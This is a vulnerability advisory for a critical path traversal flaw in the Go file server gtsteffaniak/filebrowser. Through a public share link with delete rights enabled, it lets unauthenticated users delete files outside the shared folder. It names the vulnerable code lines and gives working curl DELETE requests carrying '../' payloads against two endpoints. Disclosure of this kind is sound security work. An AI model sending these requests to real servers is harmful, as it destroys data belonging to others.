PT-2026-38413 · Go · Github.Com/Gtsteffaniak/Filebrowser
Published
2026-05-07
·
Updated
2026-05-07
·
CVE-2026-44542
CVSS v3.1
9.1
Critical
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H |
Summary
Attacker-controlled path input is joined with a trusted base path prior to sanitization, allowing traversal sequences (e.g., ../) to escape the intended shared directory. As a result, an unauthenticated attacker possessing a valid public share hash with delete permissions enabled can delete arbitrary files outside the shared directory within the share owner’s configured storage scope.
Affected Components
Two distinct vulnerable code paths:
- Stable versions (e.g., gtstef/filebrowser:stable)
DELETE /public/api/resources?hash=<hash>&path=../victimRoot cause: middleware.go:111 Issue: path query parameter is joined before SanitizeUserPath() - Development / HEAD (e.g., commit eabdfd9)
DELETE /public/api/resources/bulk?hash=<hash>Body: [{"path":"../victim"}] Root cause: resource.go:274 Issue: item.Path is joined before SanitizeUserPath()
Steps to reproduce (Stable Version)
1. Create a directory structure:
/folder/shared subdir/ (shared)
/folder/protected.txt (outside shared directory)2. Create a public share:
Path: /shared subdir
AllowDelete=true3. Send request:
curl -X DELETE "http://localhost/public/api/resources?hash=<HASH>&path=../protected.txt"
#Observe:
#protected.txt is deleted despite being outside the shared directoryProof of Concept (HEAD / bulk endpoint)
curl -X DELETE "http://localhost/public/api/resources/bulk?hash=<HASH>"
-H "Content-Type: application/json"
-d '[{"path":"../protected.txt"}]'Alternative PoC Scripts:
[poc v3.sh](https://github.com/user-attachments/files/26159404/poc v3.sh) (If the script fails due to environment differences, the manual PoC above reliably reproduces the issue.)
Impact
An unauthenticated attacker with access to a public share link configured with delete permissions enabled can delete attacker-chosen files outside the shared directory, anywhere within the share owner’s storage scope. This results in unauthorized data loss and potential service disruption.
Fix
Path traversal
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Github.Com/Gtsteffaniak/Filebrowser